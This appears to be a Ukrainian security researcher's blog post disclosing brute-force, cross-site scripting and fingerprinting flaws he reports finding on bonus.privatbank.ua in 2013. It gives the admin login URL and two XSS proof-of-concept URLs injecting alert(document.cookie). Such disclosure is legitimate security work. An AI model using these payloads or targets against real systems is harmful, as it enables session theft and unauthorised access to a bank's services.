Уразливості на bonus.privatbank.ua
22:53 31.08.2022Раніше, 12.03.2013, я знайшов Brute Force, Cross-Site Scripting та Fingerprinting уразливості на сайті bonus.privatbank.ua. В той час я вислав ці уразливості банку.
Brute Force (WASC-11):
http://bonus.privatbank.ua/sa/close/login
Відсутність захисту від підбору пароля адміна.
Cross-Site Scripting (WASC-08):
http://bonus.privatbank.ua/single/chat/category/1%22;alert(document.cookie);a=%22
http://bonus.privatbank.ua/single/chat/question/70%22;alert(document.cookie);a=%22
Також виявив численні Fingerprinting уразливості - витоки версій додатків і використання старих версій веб сервера та MySQL.
ПриватБанк тоді проігнорував ці уразливості, але через багато років приховано виправив. Таким чином банк кинув мене, як це було з дірками на promos.privatbank.ua та інших сайтах ПБ.